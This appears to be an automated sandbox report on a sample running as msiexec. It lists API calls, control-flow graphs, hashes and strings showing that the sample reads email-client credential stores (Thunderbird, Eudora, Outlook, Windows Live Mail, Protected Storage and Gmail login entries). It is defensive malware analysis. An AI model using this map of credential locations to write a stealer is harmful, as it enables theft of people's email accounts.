RegQueryValueExA 33612->33621 33614 4445a4 33614->33615 33622 410add RegQueryValueExA 33614->33622 33615->33491 33619 4021b6 memset 33615->33619 33617 4445c1 33617->33615 33623 444879 30 API calls 33617->33623 33619->33493 33620->33491 33621->33614 33622->33617 33623->33615 33624->33510 33626 4075c9 33625->33626 33627 4075bb _mbscat 33625->33627 33628 444212 33626->33628 33627->33626 33645 407e9d 33628->33645 33631 44424d 33632 444274 33631->33632 33633 444258 33631->33633 33653 407ef8 33631->33653 33634 407e9d 9 API calls 33632->33634 33670 444196 51 API calls 33633->33670 33642 4442a0 33634->33642 33636 407ef8 9 API calls 33636->33642 33637 4442ce 33667 407f90 33637->33667 33641 407f90 FindClose 33643 4442e4 33641->33643 33642->33636 33642->33637 33644 444212 64 API calls 33642->33644 33663 407e62 33642->33663 33643->33532 33644->33642 33646 407f90 FindClose 33645->33646 33647 407eaa 33646->33647 33648 406f06 2 API calls 33647->33648 33649 407ebd strlen strlen 33648->33649 33650 407ee1 33649->33650 33651 407eea 33649->33651 33671 4070e3 strlen _mbscat _mbscpy _mbscat 33650->33671 33651->33631 33654 407f03 FindFirstFileA 33653->33654 33655 407f24 FindNextFileA 33653->33655 33656 407f3f 33654->33656 33657 407f46 strlen strlen 33655->33657 33658 407f3a 33655->33658 33656->33657 33660 407f7f 33656->33660 33657->33660 33661 407f76 33657->33661 33659 407f90 FindClose 33658->33659 33659->33656 33660->33631 33672 4070e3 strlen _mbscat _mbscpy _mbscat 33661->33672 33664 407e6c strcmp 33663->33664 33666 407e94 33663->33666 33665 407e83 strcmp 33664->33665 33664->33666 33665->33666 33666->33642 33668 407fa3 33667->33668 33669 407f99 FindClose 33667->33669 33668->33641 33669->33668 33670->33631 33671->33651 33672->33660 33673->33186 33674->33190 33675->33197 33676->33196 33677->33203 33678->33200 33679->33195 33697 411853 RtlInitializeCriticalSection memset 33698 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33873 40a256 13 API calls 33875 432e5b 17 API calls 33877 43fa5a 20 API calls 33700 401060 41 API calls 33880 427260 CloseHandle memset memset 33704 410c68 FindResourceA SizeofResource LoadResource LockResource 33882 405e69 14 API calls 33706 433068 15 API calls __fprintf_l 33884 414a6d 18 API calls 33885 43fe6f 134 API calls 33708 424c6d 15 API calls __fprintf_l 33886 426741 19 API calls 33710 440c70 17 API calls 33711 443c71 42 API calls 33714 427c79 24 API calls 33889 416e7e memset __fprintf_l 33717 43f400 15 API calls 33718 42800b 47 API calls 33719 425115 82 API calls __fprintf_l 33892 41960c 61 API calls 33720 43f40c 122 API calls __fprintf_l 33723 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33724 43f81a 20 API calls 33726 414c20 memset memset 33727 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 33896 414625 18 API calls 33897 404225 modf 33898 403a26 strlen WriteFile 33900 40422a 12 API calls 33904 427632 memset memset memcpy 33905 40ca30 59 API calls 33906 404235 26 API calls 33729 425115 76 API calls __fprintf_l 33907 425115 77 API calls __fprintf_l 33909 44223a 38 API calls 33735 43183c 112 API calls 33910 44b2c5 _onexit __dllonexit 33915 42a6d2 memcpy __allrem 33737 405cda 60 API calls 33923 43fedc 138 API calls 33924 4116e1 16 API calls __fprintf_l 33740 4244e6 19 API calls 33742 42e8e8 127 API calls __fprintf_l 33743 4118ee RtlLeaveCriticalSection 33929 43f6ec 22 API calls 33745 425115 119 API calls __fprintf_l 33746 410cf3 EnumResourceNamesA 33932 4492f0 memcpy memcpy 33934 43fafa 18 API calls 33936 4342f9 15 API calls __fprintf_l 33747 4144fd 19 API calls 33938 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 33939 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33942 443a84 _mbscpy 33944 43f681 17 API calls 33750 404487 22 API calls 33946 415e8c 16 API calls __fprintf_l 33754 411893 RtlDeleteCriticalSection __fprintf_l 33755 41a492 42 API calls 33950 403e96 34 API calls 33951 410e98 memset SHGetPathFromIDList SendMessageA 33757 426741 109 API calls __fprintf_l 33758 4344a2 18 API calls 33759 4094a2 10 API calls 33954 4116a6 15 API calls __fprintf_l 33955 43f6a4 17 API calls 33956 440aa3 20 API calls 33958 427430 45 API calls 33762 4090b0 7 API calls 33763 4148b0 15 API calls 33765 4118b4 RtlEnterCriticalSection 33766 4014b7 CreateWindowExA 33767 40c8b8 19 API calls 33769 4118bf RtlTryEnterCriticalSection 33963 42434a 18 API calls __fprintf_l 33965 405f53 12 API calls 33777 43f956 59 API calls 33779 40955a 17 API calls 33780 428561 36 API calls 33781 409164 7 API calls 33969 404366 19 API calls 33973 40176c ExitProcess 33976 410777 42 API calls 33786 40dd7b 51 API calls 33787 425d7c 16 API calls __fprintf_l 33978 43f6f0 25 API calls 33979 42db01 22 API calls 33788 412905 15 API calls __fprintf_l 33980 403b04 54 API calls 33981 405f04 SetDlgItemTextA GetDlgItemTextA 33982 44b301 ??3@YAXPAX 33985 4120ea 14 API calls 3 library calls 33986 40bb0a 8 API calls 33988 413f11 strcmp 33792 434110 17 API calls __fprintf_l 33794 425115 108 API calls __fprintf_l 33989 444b11 _onexit 33796 425115 76 API calls __fprintf_l 33799 429d19 10 API calls 33992 444b1f __dllonexit 33993 409f20 _strcmpi 33801 42b927 31 API calls 33996 433f26 19 API calls __fprintf_l 33997 44b323 FreeLibrary 33998 427f25 46 API calls 33999 43ff2b 17 API calls 34000 43fb30 19 API calls 33808 414d36 16 API calls 33810 40ad38 7 API calls 34002 433b38 16 API calls __fprintf_l 33680 44b33b 33681 44b344 ??3@YAXPAX 33680->33681 33682 44b34b 33680->33682 33681->33682 33683 44b354 ??3@YAXPAX 33682->33683 33684 44b35b 33682->33684 33683->33684 33685 44b364 ??3@YAXPAX 33684->33685 33686 44b36b 33684->33686 33685->33686 33687 44b374 ??3@YAXPAX 33686->33687 33688 44b37b 33686->33688 33687->33688 33814 426741 21 API calls 33815 40c5c3 123 API calls 33817 43fdc5 17 API calls 34003 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33820 4161cb memcpy memcpy memcpy memcpy 34008 43ffc8 18 API calls 34010 4383cc 110 API calls __fprintf_l 33822 4275d3 41 API calls 34011 4153d3 22 API calls __fprintf_l 33823 444dd7 _XcptFilter 34016 4013de 15 API calls 34018 425115 111 API calls __fprintf_l 34019 43f7db 18 API calls 34022 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33826 4335ee 16 API calls __fprintf_l 34024 429fef 11 API calls 33827 444deb _exit _c_exit 34025 40bbf0 133 API calls 33830 425115 79 API calls __fprintf_l 34029 437ffa 22 API calls 33834 4021ff 14 API calls 33835 43f5fc 149 API calls 34030 40e381 9 API calls 33837 405983 40 API calls 33838 42b186 27 API calls __fprintf_l 33839 427d86 76 API calls 33840 403585 20 API calls 33842 42e58e 18 API calls __fprintf_l 33845 425115 75 API calls __fprintf_l 33847 401592 8 API calls 32883 410b92 32886 410a6b 32883->32886 32885 410bb2 32887 410a77 32886->32887 32888 410a89 GetPrivateProfileIntA 32886->32888 32891 410983 memset _itoa WritePrivateProfileStringA 32887->32891 32888->32885 32890 410a84 32890->32885 32891->32890 34034 434395 16 API calls 33849 441d9c memcmp 34036 43f79b 119 API calls 33850 40c599 42 API calls 34037 426741 87 API calls 33854 4401a6 21 API calls 33856 426da6 memcpy memset memset memcpy 33857 4335a5 15 API calls 33859 4299ab memset memset memcpy memset memset 33860 40b1ab 8 API calls 34042 425115 76 API calls __fprintf_l 34046 4113b2 18 API calls 2 library calls 34050 40a3b8 memset sprintf SendMessageA 32892 410bbc 32895 4109cf 32892->32895 32896 4109dc 32895->32896 32897 410a23 memset GetPrivateProfileStringA 32896->32897 32898 4109ea memset 32896->32898 32903 407646 strlen 32897->32903 32908 4075cd sprintf memcpy 32898->32908 32901 410a0c WritePrivateProfileStringA 32902 410a65 32901->32902 32904 40765a 32903->32904 32906 40765c 32903->32906 32904->32902 32905 4076a3 32905->32902 32906->32905 32909 40737c strtoul 32906->32909 32908->32901 32909->32906 33862 40b5bf memset memset _mbsicmp

                                                                                                                                                Executed Functions

                                                                                                                                                Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                                                • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 345 407f86-407f88 343->345 344->345 345->342
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                                                • String ID: ACD
                                                                                                                                                • API String ID: 379999529-620537770
                                                                                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                Function 00401E69 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 261stringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                                                • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                • API String ID: 3833278029-4223776976
                                                                                                                                                • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                • API String ID: 745651260-375988210
                                                                                                                                                • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                Strings
                                                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                • API String ID: 1197458902-317895162
                                                                                                                                                • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3662548030-0
                                                                                                                                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                                                                Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                Strings
                                                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                • API String ID: 3203569119-2578778931
                                                                                                                                                • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 321->323 322->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
